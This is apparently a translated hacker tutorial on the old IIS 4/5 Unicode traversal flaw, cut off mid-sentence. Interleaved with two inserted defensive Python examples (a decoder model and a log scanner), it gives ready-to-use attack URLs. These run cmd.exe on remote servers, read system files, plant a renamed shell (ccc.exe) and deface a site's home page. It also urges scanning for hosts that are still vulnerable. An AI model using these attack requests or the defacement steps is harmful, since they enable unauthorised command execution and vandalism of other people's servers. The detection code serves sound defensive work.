IIS5 Unicode Encoding Vulnerability

Everyone has surely known about the IIS5 Unicode encoding vulnerability for a long time. I don't know what else to write for a first tutorial, so I'll just write up how this hole is attacked.
1. First, let's look at the principle behind this vulnerability.
The Chinese versions of IIS 4 and IIS 5 have a bug in their Unicode decoding: the decoder accepts an odd encoding of the form
%c1%hh and %c0%hh (with 0x00 <= 0xhh < 0x40)
and IIS decodes "%c1%hh" into the single byte (0xc1 - 0xc0) * 0x40 + 0xhh.
For example (Windows + IIS 5.0 + SP1, Simplified Chinese):
Http://192.168.8.48/A.ida/%c1%00.ida
IIS answers that the file "@.ida" cannot be found: (0xc1-0xc0) * 0x40 + 0x00 = 0x40 = '@'
Http://192.168.8.48/A.ida/%c1%01.ida
IIS answers that the file "A.ida" cannot be found: (0xc1-0xc0) * 0x40 + 0x01 = 0x41 = 'A'
Http://192.168.8.48/A.ida/%c1%02.ida
IIS answers that the file "B.ida" cannot be found, and so on.
Http://192.168.8.48/A.ida/%c0%21.ida
IIS answers that the file "!.ida" cannot be found: (0xc0-0xc0) * 0x40 + 0x21 = 0x21 = '!'
This means the decoding quirk can be exploited. For example:
%c1%1c -> (0xc1-0xc0) * 0x40 + 0x1c = 0x5c = '\'
%c0%2f -> (0xc0-0xc0) * 0x40 + 0x2f = 0x2f = '/'
Both are path separators, so we can step into other directories this way.
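The decoding rule above, modelled in Python. This is an added example, not code from the original tutorial, and the function names are mine. lenient_decode_bytes assumes the faulty decoder keeps only the low six bits of the second byte (a mask of 0x3F) rather than requiring 0xhh < 0x40; that assumption reproduces every example on this page and also explains why %c0%af acts as '/'. vulnerable_check and fixed_check model the check-then-decode ordering that turns the quirk into a traversal; they are a model of the bug, not IIS's own code. separator_sequences goes beyond the page's two examples and lists every second byte that collapses to a separator.

```python
import re

_ESC = re.compile(r"%([0-9a-fA-F]{2})")

def percent_unescape(url_path: str) -> bytes:
    """First pass: turn every %hh escape into one raw byte."""
    out = bytearray()
    i = 0
    while i < len(url_path):
        m = _ESC.match(url_path, i)
        if m:
            out.append(int(m.group(1), 16))
            i = m.end()
        else:
            out += url_path[i].encode("latin-1", "replace")
            i += 1
    return bytes(out)

def lenient_decode_bytes(raw: bytes) -> str:
    """Second pass as the tutorial describes it: a lead byte 0xC0..0xDF is
    combined with WHATEVER byte follows as ((lead & 0x1F) << 6) | (next & 0x3F),
    without checking that `next` is a continuation byte (0x80..0xBF).
    For lead 0xC1 and next < 0x40 this is exactly (0xC1-0xC0)*0x40 + next.
    Assumption: the 0x3F mask, which also makes %c0%af decode to '/'."""
    out = []
    i = 0
    while i < len(raw):
        b = raw[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(raw):
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)

def lenient_decode(url_path: str) -> str:
    return lenient_decode_bytes(percent_unescape(url_path))

def strict_decode(url_path: str):
    """A correct UTF-8 decoder: 0xC0/0xC1 can only start an overlong form and
    are never valid lead bytes, and a second byte outside 0x80..0xBF is not a
    continuation byte, so every sequence on this page is rejected (None)."""
    try:
        return percent_unescape(url_path).decode("utf-8")
    except UnicodeDecodeError:
        return None

def escapes_webroot(path: str) -> bool:
    """True when the path climbs above the virtual directory it starts in."""
    depth = 0
    for seg in re.split(r"[\\/]+", path):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False

def vulnerable_check(url_path: str):
    """Model of the faulty order: test the once-unescaped path for '..'
    traversal, THEN apply the lenient decode. '..%c1%1c..' is one odd but
    harmless-looking segment at check time and '..\\..' when the file system
    sees it. Returns (allowed, path actually opened)."""
    raw = percent_unescape(url_path)
    if escapes_webroot(raw.decode("latin-1")):
        return (False, None)
    return (True, lenient_decode_bytes(raw))

def fixed_check(url_path: str):
    """Decode strictly first, then check the final form."""
    decoded = strict_decode(url_path)
    if decoded is None or escapes_webroot(decoded):
        return (False, None)
    return (True, decoded)

def separator_sequences():
    """Every %c0%hh / %c1%hh pair the lenient decoder turns into '/' or '\\'."""
    found = {"/": [], "\\": []}
    for lead in (0xC0, 0xC1):
        for hh in range(0x100):
            ch = lenient_decode_bytes(bytes([lead, hh]))
            if ch in found:
                found[ch].append("%%%02x%%%02x" % (lead, hh))
    return found

if __name__ == "__main__":
    for u in ("A.ida/%c1%00.ida", "%c1%1c", "%c0%2f", "%c0%af"):
        print(u, "->", repr(lenient_decode(u)), "strict:", strict_decode(u))
    attack = "/scripts/..%c1%1c../winnt/system32/cmd.exe"
    print("vulnerable:", vulnerable_check(attack), "fixed:", fixed_check(attack))
    print(separator_sequences())
```

The point the model makes clear: the traversal check is not wrong, it is run on the wrong form of the path. Once decoding happens before the check and invalid sequences are rejected outright, none of the %c0/%c1 variants survive.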
(1) Http://192.168.8.48/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
With this we get:
Directory of D:\inetpub\scripts

2000-09-28  15:49    <DIR>               .
1999-07-21  17:49           147,456      Count.exe
2000-09-12  17:08           438,290      Count25.exe
2000-10-13  15:03             8,867      Counter.err
2000-08-23  23:07           160,002      Counter.exe
1999-05-25  18:14             3,925      countnt.html
1999-07-21  17:49            64,512      Extdgts.exe
2000-08-10  15:24            46,352      Ism.dll
1999-07-21  17:49            64,512      Mkstrip.exe
1999-05-25  18:18             1,317      README.txt
2000-09-28  15:49    <DIR>               wcount
               9 File(s)    935,233 bytes
(2) We can also use this bug to read the contents of some system files:
Http://192.168.8.48/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini
IIS treats this as a request for an .asp file and hands it to asp.dll, which then opens win.ini.
On IIS 4.0 + SP6 (Chinese version) this test does not succeed, but the following form does:
Http://192.168.8.100/default.asp/a.exe/..%c1%1c../..%c1%1c../winnt/winnt.ini
Here "default.asp" must be an .asp file that really exists, while "a.exe" is an arbitrary .exe file name that need not exist.
SP1 still has this encoding problem.
On the English version the equivalent sequence is %c0%af, which decodes to '/' in the same way (the decoder keeps only the low six bits of the second byte, so 0xaf behaves like 0x2f).
2. That covers the details of the vulnerability; now let's talk about how to use it.
A. Use the IISExploitSearcher tool to look for a host with this vulnerability.
Although this hole was published long ago, you will find that many such machines can still be found.
Once we have found a machine with this hole, we do the following.
B. http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe
Requesting this URL makes the NT/2000 command interpreter cmd.exe run the copy command
copy c:\winnt\system32\cmd.exe ccc.exe
which copies c:\winnt\system32\cmd.exe to c:\inetpub\scripts\ccc.exe.
The spaces of the DOS command line are written as "+" in the URL. So to run
copy c:\winnt\system32\cmd.exe ccc.exe
you request
Http://ip/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe
The part /scripts/..%c1%1c../winnt/system32/cmd.exe?/c is fixed; its job is to invoke c:\winnt\system32\cmd.exe and have it execute the command that follows.
Oh, I forgot to say why cmd.exe is copied at all. When the program IIS loads has the string cmd.exe in its name, IIS checks the request for the special characters & ( , ; % < > and refuses them, so the interpreter has to be renamed.
C. At this point c:\winnt\system32\cmd.exe has been copied to c:\inetpub\scripts\ccc.exe. Through
Http://ip/scripts/ccc.exe?/c
we can now call cmd.exe directly, which means the encoding trick is no longer needed.
Http://ip/scripts/ccc.exe?/c+echo+hacked+by+lion+>+c:\inetpub\wwwroot\default.asp
Http://192.168.8.48/scripts/ccc.exe?/c+echo+20/10/2000+>>+c:\inetpub\wwwroot\default.asp
The home page has now been changed to:
hacked by lion
20/10/2000
In other words, his home page has been defaced.
:P
Some explanation.
echo is the echo command. If you type
echo hacked by Lion
at the DOS prompt, the screen shows
hacked by Lion
That's not all: you can also have it write the text into a file.
echo hacked by Lion > Lion.txt
After this, Lion.txt in the current directory contains the words "hacked by Lion". The "> Lion.txt" part redirects the characters into Lion.txt and overwrites whatever the file contained before.
If you then try echo 20/10/2000 > Lion.txt to add the remaining line, you will find it overwrites "hacked by Lion". What to do? Don't worry:
echo hacked by Lion > Lion.txt
echo 20/10/2000 >> Lion.txt
Look at the file now. It contains
hacked by Lion
20/10/2000
It worked.
In this way, using the explanation above with spaces replaced by "+", you can write whatever you like into someone else's home page.
One more point.
Many sites have deleted the \inetpub\scripts directory, but \Program Files\Common Files\System\msadc is still there.
(If the server has the msadcs.dll hole, you don't even need %c1%1c.)
You can then build the request like this:
Http://ip/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
and cmd.exe is called just the same.
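The request shapes used in steps A to C above (and the msadc variant) leave a distinctive trail in the IIS W3C log. The following scanner is an added example, not part of the original tutorial: it parses the "#Fields:" header IIS writes and tags records that carry the ..%cX%hh.. traversal, a "?/c+" command handed to an .exe, a renamed interpreter such as ccc.exe, or a ">"/">>" redirection of the kind used to deface default.asp. The log lines are constructed for this example and come from no real server; the field layout is IIS's default, the status codes are placeholders.

```python
import re

# Constructed sample of IIS 5 W3C extended log lines (not from any real server).
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2000-10-20 14:58:10 10.1.2.3 GET /default.asp - 200
2000-10-20 15:01:02 10.1.2.9 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 200
2000-10-20 15:01:40 10.1.2.9 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+copy+c:\winnt\system32\cmd.exe+ccc.exe 200
2000-10-20 15:02:05 10.1.2.9 GET /scripts/ccc.exe /c+echo+hacked+by+lion+>+c:\inetpub\wwwroot\default.asp 200
2000-10-20 15:03:11 10.1.2.9 GET /msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe /c+dir+c:\ 200
2000-10-20 15:04:00 10.1.2.3 GET /scripts/Count.exe page=1 200
"""

# Signatures taken from the request shapes shown in this tutorial.
TRAVERSAL = re.compile(r"\.\.%c[01]%[0-9a-f]{2}\.\.", re.I)  # ..%c1%1c.. / ..%c0%af..
CMD_QUERY = re.compile(r"^/c\+", re.I)                       # "?/c+<command>" to an .exe
REDIRECT = re.compile(r"\+>{1,2}\+")                         # echo ... > file / >> file

def parse_w3c(text):
    """Yield (line_number, {field: value}) per record, naming the columns from
    the most recent #Fields: header."""
    fields = None
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split(" ")
        if len(values) == len(fields):
            yield lineno, dict(zip(fields, values))

def scan(text):
    """Return [(line_number, client_ip, [tags])] for suspicious records."""
    findings = []
    for lineno, rec in parse_w3c(text):
        stem = rec["cs-uri-stem"]
        query = rec["cs-uri-query"]
        tags = []
        if TRAVERSAL.search(stem):
            tags.append("unicode-traversal")
        if stem.lower().endswith(".exe") and CMD_QUERY.match(query):
            tags.append("cmd-via-query")
            if not stem.lower().endswith("/cmd.exe"):
                # the "copy cmd.exe ccc.exe" step: a shell under another name
                tags.append("renamed-cmd")
        if REDIRECT.search(query):
            tags.append("file-write")
        if tags:
            findings.append((lineno, rec["c-ip"], tags))
    return findings

def attacker_ips(text):
    """Distinct client addresses behind any finding."""
    return {ip for _, ip, _ in scan(text)}

if __name__ == "__main__":
    for lineno, ip, tags in scan(SAMPLE_LOG):
        print(f"line {lineno:>3}  {ip:<10} {', '.join(tags)}")
    print("attackers:", sorted(attacker_ips(SAMPLE_LOG)))
```

The signatures only match the sequences spelled out on this page; a broader detector would decode cs-uri-stem the way the vulnerable server does and flag any request whose decoded path leaves the web root, and would also watch for new .exe files appearing under \inetpub\scripts, since the renamed copy is the attacker's persistent foothold after the traversal itself is patched.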
3. Of course we won't stop at defacing the home page; we want to go further and control the whole machine.
:P
Here are a few ways to control the machine.
A. If C:\winn